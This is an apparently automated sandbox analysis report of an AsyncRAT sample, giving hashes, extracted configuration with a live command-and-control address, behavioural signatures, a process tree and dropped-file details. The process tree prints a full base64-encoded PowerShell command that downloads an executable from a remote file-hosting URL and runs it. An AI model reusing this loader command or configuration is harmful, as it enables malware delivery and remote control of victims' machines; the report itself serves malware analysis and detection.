Analysis

  • max time kernel
    173s
  • max time network
    179s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-12-2022 07:15

General

  • Target

    KXCBDS21.exe

  • Size

    6KB

  • MD5

    6645e5ca45fe6a10f0b8074e6eb9446d

  • SHA1

    55f764b18942e6ec6ae6c8b98cf2cf465cec3d28

  • SHA256

    c4a7879913019bb57160451e088ea2cd02386406204af973201ce7ac507c186c

  • SHA512

    75310173106c1be9adbd374de49408d96dd024fd7c853195f35bfe8bbf4cf12c0b2be2af3c388dfe35c1f083140a1716b1221772911a2af69cc7166be19163d0

  • SSDEEP

    96:MmvzgD79ClVCFjoYD9uJLNjNTyAYxsNvk+W+jD1TIoDcW33jJWw3d3ojXrl:MmU9CKFrDsNjNLYuvkkeW33jJWed8

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KXCBDS21.exe
    "C:\Users\Admin\AppData\Local\Temp\KXCBDS21.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADQANAA5ADQAMAA5ADMAMwAxADUAMAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAdQBhAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG4AagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBEAFMANAAuAGUAeABlACcAKQApADwAIwB3AHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG4AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARABTADQALgBlAHgAZQAnACkAPAAjAGUAYgBoACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4448
      • C:\Users\Admin\AppData\Roaming\JDSDS4.exe
        "C:\Users\Admin\AppData\Roaming\JDSDS4.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:1524

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\JDSDS4.exe
      Filesize

      14.7MB

      MD5

      6f6b812c166e53dc9b52b9b60e5ed369

      SHA1

      e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

      SHA256

      ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

      SHA512

      8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

    • C:\Users\Admin\AppData\Roaming\JDSDS4.exe
      Filesize

      14.7MB

      MD5

      6f6b812c166e53dc9b52b9b60e5ed369

      SHA1

      e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

      SHA256

      ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

      SHA512

      8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

    • memory/1524-149-0x0000000000530000-0x0000000000542000-memory.dmp
      Filesize

      72KB

    • memory/1524-147-0x0000000000000000-mapping.dmp
    • memory/1764-144-0x0000000006F00000-0x00000000074A4000-memory.dmp
      Filesize

      5.6MB

    • memory/1764-139-0x0000000000000000-mapping.dmp
    • memory/1764-143-0x00000000003F0000-0x00000000012A2000-memory.dmp
      Filesize

      14.7MB

    • memory/1764-145-0x0000000006580000-0x0000000006612000-memory.dmp
      Filesize

      584KB

    • memory/1764-146-0x00000000066D0000-0x000000000676C000-memory.dmp
      Filesize

      624KB

    • memory/4308-137-0x00007FFAD9D50000-0x00007FFADA811000-memory.dmp
      Filesize

      10.8MB

    • memory/4308-132-0x0000000000580000-0x0000000000588000-memory.dmp
      Filesize

      32KB

    • memory/4308-134-0x00007FFAD9D50000-0x00007FFADA811000-memory.dmp
      Filesize

      10.8MB

    • memory/4448-138-0x00007FFAD9D50000-0x00007FFADA811000-memory.dmp
      Filesize

      10.8MB

    • memory/4448-136-0x00007FFAD9D50000-0x00007FFADA811000-memory.dmp
      Filesize

      10.8MB

    • memory/4448-135-0x000001807E8E0000-0x000001807E902000-memory.dmp
      Filesize

      136KB

    • memory/4448-142-0x00007FFAD9D50000-0x00007FFADA811000-memory.dmp
      Filesize

      10.8MB

    • memory/4448-133-0x0000000000000000-mapping.dmp